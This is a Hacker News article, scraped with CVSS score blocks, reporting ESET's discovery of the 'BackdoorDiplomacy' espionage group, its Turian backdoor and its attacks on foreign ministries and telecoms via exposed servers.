Lucene search

K
thnThe Hacker NewsTHN:BCC351AC0BA61400C97A7E529C22A518
HistoryJun 11, 2021 - 7:01 a.m.

New Cyber Espionage Group Targeting Ministries of Foreign Affairs

2021-06-1107:01:00
The Hacker News
thehackernews.com
247

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

Cyber Espionage Group

Cybersecurity researchers on Thursday took the wraps off a new cyber espionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017.

Dubbed “BackdoorDiplomacy,” the campaign involves targeting weak points in internet-exposed devices such as web servers to perform a panoply of cyber hacking activities, including laterally moving across the network to deploy a custom implant called Turian that’s capable of exfiltrating sensitive data stored in removable media.

“BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. Turian likely represents a next stage evolution of Quarian, the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S,” said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET.

Engineered to target both Windows and Linux operating systems, the cross-platform group singles out management interfaces for networking equipment and servers with internet-exposed ports, likely exploiting unpatched vulnerabilities to deploy the China Chopper web shell for initial access, using it to conduct reconnaissance and install the backdoor.

Targeted systems include F5 BIG-IP devices (CVE-2020-5902), Microsoft Exchange servers, and Plesk web hosting control panels. Victims have been identified in the Ministries of Foreign Affairs of multiple African countries, as well as in Europe, the Middle East, and Asia. Additionally, telecom providers in Africa and at least one Middle Eastern charity have also been hit.

“In each case, operators employed similar tactics, techniques, and procedures (TTPs), but modified the tools used, even within close geographic regions, likely to make tracking the group more difficult,” the researchers said. BackdoorDiplomacy is also believed to overlap with previously reported campaigns operated by a Chinese-speaking group Kaspersky tracks as “CloudComputating.”

Besides its features to gather system information, take screenshots, and carry out file operations, ESET researchers said Turian’s network encryption protocol is nearly identical to that employed by WhiteBird, a C++ backdoor operated by an Asia-based threat actor named Calypso, that was installed within diplomatic organizations in Kazakhstan and Kyrgyzstan, and during the same timeframe as BackdoorDiplomacy.

Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C